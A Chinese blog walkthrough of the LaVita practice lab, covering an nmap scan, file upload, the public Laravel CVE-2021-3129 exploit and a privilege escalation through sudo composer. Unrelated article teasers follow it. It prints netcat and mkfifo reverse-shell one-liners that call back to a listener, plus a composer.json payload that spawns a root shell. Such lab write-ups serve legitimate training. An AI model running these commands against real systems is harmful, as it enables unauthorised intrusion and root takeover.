当前位置：首页 > article >正文

靶场（十五）---小白心得思路分析---LaVita

article 2026/2/27 9:29:46

启程：

扫描端口，发现开放22，80端口，发现ws.css可能存在exp，经查发现无可利用的exp

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

既然服务没有入口点，那么就该扩展自己的攻击面了，所以老样子扫扫目录看看有没有啥东西

尝试了一下发现好玩的只有login.php和register.php，然后尝试了一下弱口令不太行，本来打算爆破一下的

然后发现在register.php创建账号时，看到人家最短密码都要8位数一下子放弃了，后来创建了一个用户登录一下

发现存在一个上传文件的地方，尝试了一下简单的php执行文件上传，看返回包好像没拒绝

然后访问了一下，发现什么都没有，但是爆出来一个版本，果断查查他的exp

然后果然找到一个这个版本存在的RCE的exp

但是这里需要注意两点要使用这个脚本，第一个就是回连的命令要用我这个，第二个就是如果在尝试命令执行失败的情况下，果断重新使用脚本，不然在第一次命令执行失败后，第二次命令会执行不了，必须重启脚本

nc -c /bin/bash 192.168.49.55 1234

然后这里看到我们执行第二个payload的时候，便出现了连接成功的样子

这里也是成功拿到了一个普通用户shell

上传linpeas之后，发现一个用户存在sudo组，然后恰好我们在linpeas中也看到一个password，打算横向一下，结果库库失败

然后我们在尝试密码横向失败之后，在看进程之后发现这个skunk用户底下在执行php文件

然后通过pspy定位到了这个进程

果断插入执行php的专属反弹shell，等待回连

echo "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.55 8081>/tmp/f'); ?>" > artisan

然后就是开启监听端口，直接坐等回连即可

因为我们不是已经确认了这个用户在sudo组以下吗，果断使用sudo -l，发现一个二进制执行文件，然后果断去gtfobins上看看有没有利用方法

然后发现可以写在这个lavita底下的json文件中进行写shell

然后这一步写shell时候，注意我们需要回到www-data权限下写

echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >/var/www/html/lavita/composer.json

然后再回到我们现在拿到的用户底下执行这条命令即可成功拿到root shell

sudo /usr/bin/composer --working-dir=$TF run-script x

总结：

最近发现pspy用的需要更频繁了，linpeas已经不太够用了，所以各位要开始多用这个了pspy了，其他难度没啥，很正常

重要链接：

composer | GTFOBins

CVE-2021-3129/CVE-2021-3129.py at main · joshuavanderpoll/CVE-2021-3129

https://github.com/DominicBreuker/pspy?source=post_page-----12bfd272e9cf---------------------------------------

靶场（十五）---小白心得思路分析---LaVita

启程： 扫描端口，发现开放22，80端口，发现ws.css可能存在exp，经查发现无可利用的exp PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5deb11u2 (protocol 2.0) | ssh-hostkey: | 3072 c9…...

编程日记 2026/2/25 12:09:37

【AI大模型】DeepSeek + 通义万相高效制作AI视频实战详解

目录一、前言二、AI视频概述 2.1 什么是AI视频 2.2 AI视频核心特点 2.3 AI视频应用场景三、通义万相介绍 3.1 通义万相概述 3.1.1 什么是通义万相 3.2 通义万相核心特点 3.3 通义万相技术特点 3.4 通义万相应用场景四、DeepSeek 通义万相制作AI视频流程 4.1 D…...

编程日记 2026/2/14 9:08:56

Pi型隶属函数（Π-shaped Membership Function）的详细介绍及python示例

我们前文已经深度解读了三角形、梯形、高斯、S型和Z型隶属函数，现在转向Pi型。当然我们先简要回顾不同隶属函数的特点和曲线效果。了解每种隶属函数的特性是为了更好的应用。一、回顾五种隶属函数的特点 1.从每种隶属函数的结构和特点角度对比。三角形隶属函数&am…...

编程日记 2026/2/14 6:50:10

MySQL 入门大全：常用函数

🧑 博主简介：CSDN博客专家，历代文学网（PC端可以访问：https://literature.sinhy.com/#/literature?__c1000，移动端可微信小程序搜索“历代文学”）总架构师，15年工作经验，…...

编程日记 2026/2/21 22:41:03

轻量级TLS反向代理工具TLS-reverse-proxy：打造安全通信桥梁

在数字化浪潮席卷全球的今天，数据隐私与传输安全已成为企业及个人的核心关切。TLS（传输层安全协议）作为互联网通信的"隐形卫士"，承担着保护数据在传输过程中不被窃取或篡改的重要使命。然而，对于许多传统服务…...

编程日记 2025/12/22 19:49:19

SpringBoot3实战（SpringBoot3+Vue3基本增删改查、前后端通信交互、配置后端跨域请求、数据批量删除(超详细)）(3)

目录一、从0快速搭建SpringBoot3工程、SpringBoot3集成MyBatis、PageHelper分页查询的详细教程。(博客链接) 二、实现前端与后端通信对接数据。(axios工具) （1）安装axios。(vue工程目录) （2）封装请求工具类。(request.js) <1&…...

编程日记 2026/2/25 17:36:58

AF3 Rotation 类解读

Rotation 类（rigid_utils 模块）是 AlphaFold3 中用于 3D旋转的核心组件，支持两种旋转表示： 1️⃣ 旋转矩阵 (3x3) 2️⃣ 四元数 (quaternion, 4元向量) 👉 设计目标：允许灵活选择旋转矩阵或四元数封装了常用的旋转操作（组合、逆旋转、应用到点上等）像 torch.…...

编程日记 2025/8/3 2:31:39

文章目录前言1.串行(Serial 收集器/Serial Old 收集器)Serial 收集器Serial Old 收集器相关参数-XX:UseSerialGC 2.吞吐量优先(Parallel Scavenge 收集器/Parallel Old 收集器)Parallel Scavenge 收集器Parallel Old 收集器相关参数-XX:UseParallelGC ~ -XX:UseParallelOldGC-…...

编程日记 2026/2/14 19:11:31

Linux上位机开发实战（编写API库）

编程日记 2026/2/23 17:33:02

深入浅出JVM性能优化：从理论到实践

一、JVM架构与内存模型深度解析 1.1 JVM运行时数据区全景图方法区（元空间）：存储类信息、常量池等元数据堆内存：对象实例存储核心区域 Young Generation（新生代） Eden区（对象诞生地&#xff0…...

编程日记 2025/7/23 20:43:47

Redis Sentinel 详解

Redis Sentinel 详解 1. 什么是 Redis Sentinel？有什么用？ Redis Sentinel（哨兵） 是 Redis 官方提供的高可用性解决方案，主要用于监控、通知和自动故障转移。当 Redis 主节点（master）发生故障…...

编程日记 2025/10/27 13:14:09

器件功耗模型原理

器件功耗模型原理谷歌提供了一套通用的器件耗电模型和配置方案，先对器件进行耗电因子拆解，建立器件功耗模型，得到一个器件耗电的计算公式。通过运行时统计器件的使用数据，代入功耗模型，就可以计算出器件的功耗。例如…...

编程日记 2026/2/13 17:21:40

拥抱成长型思维：解锁持续进步的人生密码

我强烈推荐4本可以改变命运的经典著作： 《寿康宝鉴》在线阅读白话文《欲海回狂》在线阅读白话文《阴律无情》在线阅读白话文《了凡四训》在线阅读白话文一、什么是成长型思维？ 成长型思维（Growth Mindset）由斯坦福大学心理学家卡…...

编程日记 2026/2/23 12:53:44

Ubuntu上查看GPU使用情况并释放内存

先用nvidia-smi查看GPU当前使用情况再用fuser 命令查找对应显卡上占用 GPU 的进程最后查到了用kill -9强制杀掉进程（PID）即可...

编程日记 2026/2/7 0:52:04

解决思科交换机无法访问局域网外设备

问题背景有时，我们需要远程连接来管理一台思科交换机，例如使用SSH协议。然而交换机运作在链路层，这就需要交换机有一个网络层地址，来接纳基于IP协议的远程访问请求。于是，我们依靠设置一个带有IP地址的交换机虚拟接口…...

编程日记 2026/2/25 18:23:22

Unity Shader编程】之透明物体渲染

以下是针对您提出的关于 Unity Shader 渲染 Pass 的查看方法、多个 Pass 的影响、Pass 的含义，以及 Unity 渲染物体的流程和处理多个透明/半透明/不透明物体的详细解答。 1. Unity Shader 渲染 Pass 的查看方法查看 Pass 的方法通过 Shader 代码： 打开…...

编程日记 2026/1/4 13:59:19

fopen和open 等区别是什么?文件描述符与文件描述指针区别

FILE *fp fopen(path, "w"); int fd open(path,) 1.区别函数定义所属库返回类型fopen高级文件操作函数，提供缓冲机制标准 C 库 (stdio.h)FILE*（文件指针）open低级文件操作函数，直接调用系统接口Unix/Linux 系统调用…...

编程日记 2025/7/22 20:57:45

什么是张量计算

以下是对张量计算的详细介绍，结合数学、物理学及计算机科学等多领域视角： 一、张量的基本定义与性质 1. 张量的数学定义张量是向量空间及其对偶空间的笛卡尔积上的多重线性映射，可视为多维数组或几何对象。其核心特征在于： 坐…...

编程日记 2026/2/19 12:23:08

【1】Java 零基础入门学习(小白专用)

【1】Java 零基础入门学习 📚博客主页：代码探秘者 ✨专栏：《JavaSe从入门到精通》其他更新ing… ❤️感谢大家点赞👍🏻收藏⭐评论✍🏻，您的三连就是我持续更新的动力❤️ 🙏作者水…...

编程日记 2026/2/27 3:17:55

[c语言日寄]枚举类型

【作者主页】siy2333 【专栏介绍】⌈c语言日寄⌋：这是一个专注于C语言刷题的专栏，精选题目，搭配详细题解、拓展算法。从基础语法到复杂算法，题目涉及的知识点全面覆盖，助力你系统提升。无论你是初学者，还是…...

编程日记 2026/2/26 0:35:51

替代-UX设计师

初创公司如何在没有设计师的情况下打造实用的用户体验一个常见的捷径是使用预构建的组件库，如谷歌的 Material UI它们为你提供了构建块，但它们并没有为你考虑整个用户流程你仍然需要弄清楚所有这些是如何组合在一起的但是，很多时候&#x…...

编程日记 2025/7/23 3:44:57

【氧化镓】掺杂在β-Ga2O3材料中引入的深能级缺陷

1. 引言 1.1 β-Ga2O3材料的特性与应用前景 β-Ga2O3作为一种新型的宽禁带半导体材料，具有约4.6-4.8 eV的宽带隙、高击穿场强（约8 MV/cm）和优异的热稳定性，适用于高功率和射频电子器件。其独特的物理特性使其在高电压、高频率以及高功率应用场景中具有巨大的潜力。例如，…...

编程日记 2026/2/26 9:04:47